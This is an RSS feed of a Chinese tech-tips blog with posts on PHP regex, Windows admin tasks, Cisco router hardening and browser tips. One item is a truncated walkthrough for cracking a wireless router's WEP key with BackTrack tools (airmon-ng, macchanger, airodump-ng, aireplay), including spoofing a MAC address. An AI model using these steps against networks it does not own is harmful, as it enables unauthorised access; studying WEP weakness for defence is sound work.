<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>四维映像 &#187; 实用技巧</title>
	<atom:link href="http://www.i4wei.com/tag/tips/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.i4wei.com</link>
	<description>The more a man learns, the more he sees his ignorance.</description>
	<lastBuildDate>Tue, 31 Aug 2010 18:51:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>PHP正则表达式介绍</title>
		<link>http://www.i4wei.com/2009/11/1494/</link>
		<comments>http://www.i4wei.com/2009/11/1494/#comments</comments>
		<pubDate>Wed, 11 Nov 2009 14:08:28 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1494</guid>
		<description><![CDATA[PHP正则表达式介绍： 1.中括号 [0-9]匹配0-9 [a-z]匹配a-z小写字母 [A-Z]匹配A-Z大写字母 [a-zA-Z]匹配所有大小写字母 可以使用ascii来制定更多 2.量词 p+匹配至少一个含p的字符串 p*陪陪任何包含0个或多个p的字符串 p?匹配任何包含0个或一个p的字符串 p{2}匹配包含2个p的序列的字符串 p{2,3}匹配任何包含2个或3个的字符串 p$匹配任何以p结尾的字符串 ^p匹配任何以p开头的字符串 [^a-zA-Z]匹配任何不包含a-zA-Z的字符串 p.p匹配任何包含p、接下来是任何字符、再接下来有又是p的字符串 ^.{2}$匹配任何值包含2个字符的字符串 (.*)匹配任何被包围的字符串 p(hp)*匹配任何一个包含p,后面是多个或0个hp的字符串 3.预定义字符范围 [:alpha:]同[a-zA-Z] [:alnum:]同[a-zA-Z0-9] [:cntrl:]匹配控制字符，比如制表符，反斜杠，退格符 [:digit:]同[0-9] [:graph:]所有ASCII33~166范围内可以打印的字符 [:lower:]同[a-z] [:punct:]标点符号 [:upper:]同[A-Z] [:space:]空白字符，可以是空格、水平制表符、换行、换页、回车 [:xdigit:]十六进制符同[a-fA-F0-9] 4.ereg语句可以区分大小写来判断，下例 if (ereg(&#8220;([^a-z])&#8221;,&#8221;aaaaZaaaaaaa&#8221;)) echo &#8220;不全是小写的！&#8221;; ereg还可以返回一个数组 例如 $url=&#8220;http://www.i4wei.com&#8221;; $a=ereg(&#8220;^(http://www)\.([[:alnum:]]+)\.([[:alnum:]]+)&#8221;,$url,$regs); echo $regs[0],&#8221;&#60;br&#62;&#8220;; echo $regs[1],&#8221;&#60;br&#62;&#8220;; echo $regs[2],&#8221;&#60;br&#62;&#8220;; echo $regs[3],&#8221;&#60;br&#62;&#8220;; 得到 http://www.i4wei.com http://www i4wei com Like Unlike 相关文章阅读网管的困惑Upgrade Windows 2003 DC [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/11/1494/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>网管的困惑</title>
		<link>http://www.i4wei.com/2009/11/1487/</link>
		<comments>http://www.i4wei.com/2009/11/1487/#comments</comments>
		<pubDate>Sat, 07 Nov 2009 15:22:37 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[业界动态]]></category>
		<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1487</guid>
		<description><![CDATA[作为网管的您一定有过这样的困惑，您会发现在自己的工作中有很多的困难不是来自于网络技术的，比方说领导的不理解，同事对于规章制度的不遵从等等。如果你刚刚跨入网管员的工作，那么你将会很快感到诸多的不快，觉得周围有太多的自以为是、玩世不恭和傲慢无礼的人。但是，当你做上一段时间网管工作之后，你就会从中体会到积累的智慧。 这里我假设企业的技术关系可以扩大和深化，并且能够由此带来重大的商业价值，但遗留的地雷却无处不在，许多爆炸是自己造成的，有时是故意的但却无法避免，因为我们似乎对那些传统的老问题，也就是人员、流程、组织和企业文化等出现的问题总是束手无策，而技术却不会给IT管理造成什么难题，它们基本上运作良好。 技术管理是一项挑战，IT是一个不断移动的目标。技术本身不断进化，我们也期待它们的作用能不断进化。在这样一个不断变化的环境中进行管理工作非常繁琐，也会碰到多方面的问题：关于管理的偏见、供应商操纵、模糊不清的项目要求及其更多无法摆上台面的现实。 一年接着一年，一个项目接着一个项目，我们似乎总是在走两步退一步，现在又碰到了前所未有的预算压力，企业高层不停的要求降低成本。个人而言，我也经常对无法像往常那样在技术管理中获得、部署和支持最佳实践而感到沮丧。 我们要磨破多少脚趾，直到寸步难行？ 在这个行业摸爬了几十年后，我也终于认识到，总的来说，那些具有成本效益的技术管理实际上更关注的是人、人际关系、组织流程和结构，以及企业文化，这要远远比人们热衷的各种“技术”或者是所谓的管理“最佳实践”重要的多。 事实上，我认为我们用于优化IT管理的技术和流程真的毫无意义的，除非你的身边都是能够做正确的事的正确的人。换句话说，在一家企业文化一塌糊涂，周围员工勾心斗角，办事流程拖沓昏庸的企业中，任何IT管理都是行不通的。 每个人都知道这一点。只是我们不想面对，因为我们本身就是坏人，愚蠢又疯狂，而我们不想谈论这点，因此我们更喜欢谈论服务器、台式机、操作系统、BI、CRM、ERP等等，这只是让我们不敢面对那个真正影响技术管理的因素：人。 数字的东西很容易，而有血有肉的却很难。 我们必须承认，企业文化的巨大力量还有企业高级管理团队的知识、技能、性格和经验对企业的影响是非常巨大的。我们知道各家企业高层团队成员的才干和 品德等差别很大，我们并不喜欢告诉本科毕业生很多企业的CEO实际上什么也不懂，他们能够得到了地位并非是因为表现优秀，而是因为他们的人际关系做的很 好，但我相信大多数人已经知道这一点。 企业的成功与员工的素质和团结是牢不可分的，还有他们的个性和企业策略。新的时代要求企业们通过新的组织结构和流程来获取、部署和支持技术管理。集 中控制将让位给分享控制，标准化将变为视情形而定，而操作技术将从企业战略中分离。你需要为这些变化做好准备，如果领导层和企业文化许可，你可以亲自来引 领这些变革。说出来其实很简单：要么变革，要么失败。 所做的一切都是为了企业能够快速转型和成功。我们最成功的客户们都掌握了如何管理人/流程/组织/文化的软艺术，长久以来他们已经接受了人力因素作为成功的主要驱动力的理念。在以人为本的理念下，每个人都可以提高技术能力，为企业节约资金以及带来收入。 最后的话：与人、流程、组织和企业文化打交道比配置服务器、更新桌面或者跟踪服务水平要困难得多。如果你更加注重这些因素而不是技术本身，你就可以大大提高IT管理的服务和灵活性。 51CTO.com译稿 原文：IT Management: It&#8217;s Organic, Not Digital 作者：Steve Andriole 相关文章阅读PHP正则表达式介绍Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法Windows 2003 Error Event ID 7026]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/11/1487/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Upgrade Windows 2003 DC to Windows Server 2008</title>
		<link>http://www.i4wei.com/2009/11/1468/</link>
		<comments>http://www.i4wei.com/2009/11/1468/#comments</comments>
		<pubDate>Thu, 05 Nov 2009 15:06:14 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[电脑技术]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Windows2008]]></category>
		<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1468</guid>
		<description><![CDATA[I have been using Windows Server 2003 for years and I believe it&#8217;s time to shift and try using Windows Server 2008. I decide to Upgrade my Windows Server 2003 Standard Edition Domain Controller, which is also a DNS &#38; DHCP Server, to Windows Server 2008 Enterprise Edition. I will show you step by step [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/11/1468/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Disable the Hidden Administrative Shares</title>
		<link>http://www.i4wei.com/2009/09/1340/</link>
		<comments>http://www.i4wei.com/2009/09/1340/#comments</comments>
		<pubDate>Sun, 27 Sep 2009 02:10:31 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1340</guid>
		<description><![CDATA[By default Microsoft Windows system automatically creates hidden “administrative shares” for its logical drives C:, D: &#8230; with share names C$, D$ &#8230; It also creates the admin$ hidden share for to the \winnt or windows folder. These shares are designed for remote access support by domain administrators. You can manually delete these shares by [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/09/1340/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>忘记root密码的解决办法</title>
		<link>http://www.i4wei.com/2009/09/1332/</link>
		<comments>http://www.i4wei.com/2009/09/1332/#comments</comments>
		<pubDate>Tue, 22 Sep 2009 18:53:54 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1332</guid>
		<description><![CDATA[1.在开机启动的时候能看到引导目录，用上下方向键选择你忘记密码的那个系统，然后按“e”。 2.接下来你可以看到如下图所示的画面，然后你再用上下键选择最新的内核，然后在按“e”。 3.执行完上步操作后可以看到下面的画面，在rhgb quiet最后加“空格”，然后键入“single”，或者直接输入数字的“1”并回车确定。 4.按“b”键，重新引导系统。 5.进入到系统后就可以用熟悉的passwd root来更改root的密码了。改完后reboot即可。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares Windows 2003 Error Event ID 7026]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/09/1332/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 2003 Error Event ID 7026</title>
		<link>http://www.i4wei.com/2009/09/1277/</link>
		<comments>http://www.i4wei.com/2009/09/1277/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 13:08:31 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1277</guid>
		<description><![CDATA[An HP Proliant server running Microsoft Windows 2003 SP2 constantly has an error at system-start. The service is i8042prt and the Event ID is 7026 with the error “The following boot-start or system-start driver(s) failed to load: i8042prt”. I found a reference to this error from Microsoft. According to Microsoft, the i8042prt subkey stores data [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/09/1277/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Autimatic Renaming Files Using a Batch File</title>
		<link>http://www.i4wei.com/2009/07/980/</link>
		<comments>http://www.i4wei.com/2009/07/980/#comments</comments>
		<pubDate>Thu, 16 Jul 2009 13:31:48 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=980</guid>
		<description><![CDATA[Everyday I need to rename the backup file with date stamp in the file name, here is the batch .bat file, and I use scheduled task to run it. @ECHO OFF FOR /f &#8220;tokens=2 delims= &#8221; %%D in (&#8216;echo %DATE:/=%&#8217;) DO SET DATEN=%%D IF EXIST backup.txt RENAME backup.txt backup-%DATEN%.txt The backup file will rename to [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/980/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WinRAR的三种安全战术</title>
		<link>http://www.i4wei.com/2009/07/968/</link>
		<comments>http://www.i4wei.com/2009/07/968/#comments</comments>
		<pubDate>Sat, 11 Jul 2009 14:58:35 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=968</guid>
		<description><![CDATA[一、拒绝利用WinRAR捆绑的恶意程序 不少木马、硬盘炸弹等恶意程序就是利用WinRAR自解压程序捆绑程序来伪装自己。那如何区别正常的自解压文件和捆绑了恶意程序的自解压文件呢？只要能发现自释放文件里面隐藏有多个文件，特别是多个可执行文件，就可以判定其中含有恶意程序。那么怎样才能知道自释放文件中含有几个文件，是哪些文件呢？ 一个简单的识别方法是：用鼠标右击WinRAR自释放文件，在弹出菜单中选择“属性”，在“属性”对话框中你会发现较之普通的EXE文件多出两个标 签，分别是：“档案文件”和“注释”。单击“注释”标签，看其中的注释内容，你就会发现里面含有哪些文件了，这样就可以做到心中有数，这是识别用 WinRAR捆绑恶意程序文件的最好方法。 还有一个防范恶意程序方法，就是遇到WinRAR自解压程序不要直接运行，而是选择右键菜单中的“用WinRAR打开”，这样你就会发现该文件中到底有什么了。 二、压缩文件密码自动加 当用WinRAR创建很多个加密压缩包时，需要一个一个地来设置密码，这样效率非常低。其实我们可以利用WinRAR的设置默认的压缩选项，在生成压缩文件的同时自动加上一个自已设定的密码。 点击WinRAR菜单中的“选项→设置”，选择“压缩”选项卡。点击“创建默认配置”按钮，然后选择“高级”选项卡，再单击“设置密码”按钮，输入自己的密码，还可根据需要来选择是否加密文件名。 连续按两次确定，出现询问是否保存密码时按“是”保存设置即可。这样设置后，每次使用右键快捷菜单来创建压缩文件时，都会自动地添加你输入的默认密 码，节省了不少宝贵的时间。所有压缩文件创建完成后，再按以上步骤，即单击“选项→设置→压缩→创建默认配置→高级→设置密码”，将密码保持为空，单击“ 确定”。这样，无论别人在你的电脑还是其他电脑打开你的压缩文件时都必须输入你刚才的密码才能打开。 三、轻松禁用WinRAR设置 如果不想让别人操作你的WinRAR 主菜单，我们可以写一段注册表文件。首先打开记事本，系统是Windows 2000/XP/2003的请输入如下代码： Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\WinRAR\Policy] Menu=dword：00000000 Settings=dword：00000000 其中的Menu项设置可为0/1，用来禁止/允许WinRAR 主菜单，而Settings项设置也可为0/1，用来禁止/允许“设置”和“选择工具栏按钮”对话框。 把这个文本文档另存为Nowinrar.reg，再双击把此REG文件导入注册表。现在启动WinRAR，主菜单不见了，按“Ctrl+S”组合键 也无法调出“设置”对话框。要恢复就把上面代码中的00000000改为00000001，另存为winrar.reg。双击该文件导入注册表即可恢复菜 单，并允许使用“设置”窗口。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/968/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Howto: 注册@msn.com邮箱地址</title>
		<link>http://www.i4wei.com/2009/07/940/</link>
		<comments>http://www.i4wei.com/2009/07/940/#comments</comments>
		<pubDate>Mon, 06 Jul 2009 20:19:32 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=940</guid>
		<description><![CDATA[要注册Microsoft Passport邮箱时，注册页面只能选择hotmail.com或者live.com，若要注册msn.com的email地址，可以用以下的地址进行注册： https://accountservices.passport.net/reg.srf?ns=msn.com Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/940/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux下生成随机数字</title>
		<link>http://www.i4wei.com/2009/07/905/</link>
		<comments>http://www.i4wei.com/2009/07/905/#comments</comments>
		<pubDate>Fri, 03 Jul 2009 13:20:11 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=905</guid>
		<description><![CDATA[方法一： 命令大致如下： echo $((16#`dd if=/dev/urandom bs=1 count=4 2&#62;/dev/null&#124; od -A n -t x4&#124;sed s/[^1-9a-fA-F]//g`)) 分开来看： echo $((16#ABC)) 意思是将十六进制数ABC转换成十进制数 `command` 意思是两个`中间的命令执行结果做为外壳命令的参数 /dev/urandom 是个生成随机数的设备，比/dev/random稍不安全，但产生速度极快 dd if=/dev/urndom bs=1 count=4 从随机数设备中取前4个字节(32位数) 2&#62;/dev/null 意思是将错误信息重定向到空设备中 od -A n -t x4 意思是将dd过来的数据(一个随机的32位值)进行转换输出，-A n是不输出偏移标志，-t x4是将数字用16进制输出，并且4个字节一组，这样就以16进制输出一个32位的数 sed s/[^1-9a-fA-F]//g 意思是去年输出文件中非十六进制可接受的字符(此例中主要是删除行前的空格，也可以用tr -d &#8216; &#8216;或awk &#8216;{print $1}&#8217;处理) 可以用&#8221;echo 表达式&#124;bc&#8220;生成特定运算结果，比如生成0-1023范围内的随机数： echo $((16#`dd if=/dev/urandom bs=1 count=4 2&#62;/dev/null&#124; od -A [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/905/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>14条防Cisco路由器入侵法宝</title>
		<link>http://www.i4wei.com/2009/06/878/</link>
		<comments>http://www.i4wei.com/2009/06/878/#comments</comments>
		<pubDate>Mon, 29 Jun 2009 14:33:14 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[信息安全]]></category>
		<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Cisco]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=878</guid>
		<description><![CDATA[路由器是网络系统的主要设备，也是网络安全的前沿关口。如果路由器连自身的安全都没有保障，整个网络也就毫无安全可言。因此在网络安全管理上，必须对路由器进行合理规划、配置，采取必要的安全保护措施，避免因路由器自身的安全问题而给整个网络系统带来漏洞和风险。下面是一些加强路由器安全的具体措施，用以阻止对路由器本身的攻击，并防范网络信息被窃取。 1.为路由器间的协议交换增加认证功能，提高网络安全性 路由器的一个重要功能是路由的管理和维护，目前具有一定规模的网络都采用动态的路由协议,常用的有：RIP、EIGRP、OSPF、IS-IS、BGP等。当一台设置了相同路由协议和相同区域标示符的路由器加入网络后，会学习网络上的路由信息表。但此种方法可能导致网络拓扑信息泄漏，也可能由于向网络发送自己的路由信息表，扰乱网络上正常工作的路由信息表，严重时可以使整个网络瘫痪。这个问题的解决办法是对网络内的路由器之间相互交流的路由信息进行认证。当路由器配置了认证方式，就会鉴别路由信息的收发方。有两种鉴别方式，其中“纯文本方式”安全性低，建议使用“MD5方式”。 2.路由器的物理安全防范 路由器控制端口是具有特殊权限的端口，如果攻击者物理接触路由器后，断电重启，实施“密码修复流程”，进而登录路由器，就可以完全控制路由器。 3. 保护路由器口令 在备份的路由器配置文件中，密码即使是用加密的形式存放，密码明文仍存在被破解的可能。一旦密码泄漏，网络也就毫无安全可言。 4. 阻止察看路由器诊断信息 关闭命令如下： no service tcp-small-servers no service udp-small-servers 5. 阻止查看到路由器当前的用户列表 关闭命令为： no service finger 6. 关闭CDP服务 在OSI二层协议即链路层的基础上可发现对端路由器的部分配置信息: 设备平台、操作系统版本、端口、IP地址等重要信息。可以用命令: no cdp running或no cdp enable关闭这个服务。 7. 阻止路由器接收带源路由标记的包，将带有源路由选项的数据流丢弃 “IP source-route”是一个全局配置命令，允许路由器处理带源路由选项标记的数据流。启用源路由选项后，源路由信息指定的路由使数据流能够越过默认的路由，这种包就可能绕过防火墙。关闭命令如下： no ip source-route 8. 关闭路由器广播包的转发 D.o.S攻击以有广播转发配置的路由器作为反射板，占用网络资源，甚至造成网络的瘫痪。应在每个端口应用“no ip directed-broadcast”关闭路由器广播包。 9. 管理HTTP服务 HTTP服务提供Web管理接口。“no ip http server”可以停止HTTP服务。如果必须使用HTTP，一定要使用访问列表“ip http access-class”命令，严格过滤允许的IP地址，同时用“ip http authentication ”命令设定授权限制。 [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/878/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WLAN安全 &#8211; 用BT3破解无线路由密码</title>
		<link>http://www.i4wei.com/2009/06/861/</link>
		<comments>http://www.i4wei.com/2009/06/861/#comments</comments>
		<pubDate>Fri, 26 Jun 2009 16:40:54 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[信息安全]]></category>
		<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=861</guid>
		<description><![CDATA[由于无线网络的飞速发展，时下好多个人都用起了无线路由器，默认状态下无线路由是用WEP加密的，但稍有常识的人都会知道， WEP非常特别以及极其的不安全，下面我就用BT工具来做个实验，仅仅是实验。BT是BackTrack的缩写，它是基于Slackware和SLAX的自启动运行光盘，它包含了一套安全及计算机取证工具。它其实是依靠融合Auditor Security Linux和WHAX（先前的Whoppix）而创建成的。 里面集成了好多黑客工具，非常强大。废话就不多说了，破解开始： 1. 修改无线网卡的MAC地址 airmon-ng //返回 无线网卡列表 airmon-ng stop wifi0 //停止无线网卡 ifconfig wif0 down //停止无线网络 macchanger -m 00:11:22:33:44:55 wifi0 //修改网卡的mac地址 airmon-ng start wifi0 //修改后启动，应该是两个无线网卡，例如：ath0 2. 查找无线网络 airodump-ng ath0 //成功后会出现一个列表，而且不断的有pack进出，然后ctrl+c停止 3. 抓包 这里我先假设测试的无线路由名字（ESSID）叫Techippo，频道：11，MAC地址（BSSID）：88：88：88：88：88：88 airodump-ng -c 11 -w dump &#8211;bssid 88:88:88:88:88 ath0 //dump为包的名字可随意命名 新开一个Shelll aireply-ng -1 0 -e Techippo -b 88:88:88:88:88 -h 00:11:22:33:44:55 ath0 [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/861/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>巧用NET命令轻松检查自己的网络安全</title>
		<link>http://www.i4wei.com/2009/06/752/</link>
		<comments>http://www.i4wei.com/2009/06/752/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 17:26:11 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=752</guid>
		<description><![CDATA[在进行网络安全检测的过程中，各种DOS命令是我们能够找出蛛丝马迹最得心应手的工具。但是如果掌握所有DOS命令的使用可不是一件容易的事，其实，从网络安全检测角度来看，我们只要掌握其中的三条命令即可起到较好的防范作用。 一、查看网络连接状态 一般来说，安全主要是针对连接在网络上的计算机而言的。单机用户的安全问题比较少。而于连接到网络上的计算机而言，最基本的就是对网络连接进行检测。因为不论是病毒，还是木马、黑客入侵等都是通过网络来连接的。 在“运行”窗口中输入“CMD”并回车打开命令打提示符窗口，然后输入 netstat -an 这样即可查看所有与本机建立的连接。其中Proto部分表示连接方式，Local address是本地连接地址和端口，而Foreign address则是对方的地址和端口，State是当前端口的状态。 看懂了这些信息后，我们就可以判断是否有异常的连接，如果有的话则需要断开网络进行进一步的处理。 二、查看服务运行状态 计算机的各项功能一般都是与其开放的服务相对应的。因此很多入侵者在进入电脑后会开放各种服务，由此可见检测当前系统正在运行的服务是很有必要的。 在命令提示符下输入 net start 这样即可看到系统提示“已经启动以下Windows服务”，然后从其列表中看是否不明服务在运行。如果有的话，可以继续键入“net start 服务名”来查看有关该服务更加详细的信息。确认是非法运行的服务，那么只需要运行“net stop server”命令在询问是否继续操作时按“Y”键进行确认。 三、查看账户信息 很多入侵者在突破防线后，一般都会建立相应的账户，以方便下次继续侵入。对此，我们可以在命令提示符下输入 net user 这样即可显示当前系统中已经创建的所有账户名称。如果发现不是自己创建的账户，那么则需要运行“net user 账户名称”来查看其拥有的权限，如果该用户属于Administrators等权限比较高的组的，那么可以确认该账户是黑客非法创建的，赶紧使用“net user 账户名称 /del”将其删除 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/752/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>微软搜索引擎 Bing 的使用技巧</title>
		<link>http://www.i4wei.com/2009/06/748/</link>
		<comments>http://www.i4wei.com/2009/06/748/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 15:17:53 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=748</guid>
		<description><![CDATA[微软的搜索引擎 Bing.com 已经发布了，经历被墙，现在又恢复，其实 Bing 搜索引擎在某项方面还是蛮有特点的，Digital Inspiration 发布了一篇关于 Bing 的使用技巧的文章，我简单翻译一下： 1. 使用完全功能版的 Bing 在北美之外使用 Bing，你很可能使用的是本地化版本的 Bing，那么可能就有一些 Bing 功能你无法享受，如没有搜索历史，并且 Bing 的首页图片就没有美国版本那么多交互性。 为了体验全功能版本而非阉割版的 Bing，你可以到该页把你的默认地区设置为：English – US（美国 – 英语），你就能从任何地方享受完整的 Bing。另外 Bing 还有一个叫做 Bing Tour 的网站，给你演示 Bing 的功能。 2. 在 IE 收藏栏跟踪公司股票信息 如果你搜索一些公司的股票信息（如 GOOG 或者 MSFT），Bing 会自动为这些公司创建 Web Slice，然后可以把它们加入到 IE 8 的收藏栏以便能够快速看到股票信息的变化，这个功能需要使用 IE 8 才能尝试，不过目前只有美国的 Bing 才行，并且只支持纳斯达克股票，中国两市还不支持。 3. 保存搜索结果和通过 Email [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/748/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>系统重装不愁 备份Firefox插件设置</title>
		<link>http://www.i4wei.com/2009/06/744/</link>
		<comments>http://www.i4wei.com/2009/06/744/#comments</comments>
		<pubDate>Mon, 22 Jun 2009 13:38:28 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Firefox]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=744</guid>
		<description><![CDATA[喜欢使用Firefox的朋友，一定安装了许多插件来丰富浏览器的使用体验。但是每当重新安装Firefox浏览器后，原先安装的插件全都需要重新安装， 浪费了不少的时间。今天就介绍如何备份Firefox的方法，以后每次重装完，只要恢复一下就能还原以前的Firefox配置便可，非常方便。 Firefox浏览器的配置都被保存在下面的几个文件夹下，其实方法十分简单，只要把下面的目录备份了，再次安装Firefox之后，将这几个文件夹覆盖就可以还原以前的配置了。 c:\Documents and Settings\用户名\Application\DataMozillaFirefox c:\Documents and Settings\用户名\Local SettingsApplication\DataMozillaFirefox Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008火狐修复旧版技术漏洞 明年初将推火狐3.6版Disable the Hidden Administrative Shares]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/06/744/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Maxthon下Gmail无法添加附件的解决办法</title>
		<link>http://www.i4wei.com/2009/05/557/</link>
		<comments>http://www.i4wei.com/2009/05/557/#comments</comments>
		<pubDate>Thu, 07 May 2009 01:13:19 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=557</guid>
		<description><![CDATA[Gmail推出了新的附件上传方式，添加附件多了一个高级选项：显示上传进度。但是这个功能只有IE等少数浏览器支持。暂时还不支持Maxthon，360等浏览器。 要想解决问题，按一下步骤： 登录Gmail，进入Settings -&#62; General，在Attachments下选择 Basic attachment features，再进行附件上传就OK了。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/05/557/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>关闭Apache的目录浏览功能</title>
		<link>http://www.i4wei.com/2009/04/522/</link>
		<comments>http://www.i4wei.com/2009/04/522/#comments</comments>
		<pubDate>Thu, 23 Apr 2009 13:35:32 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=522</guid>
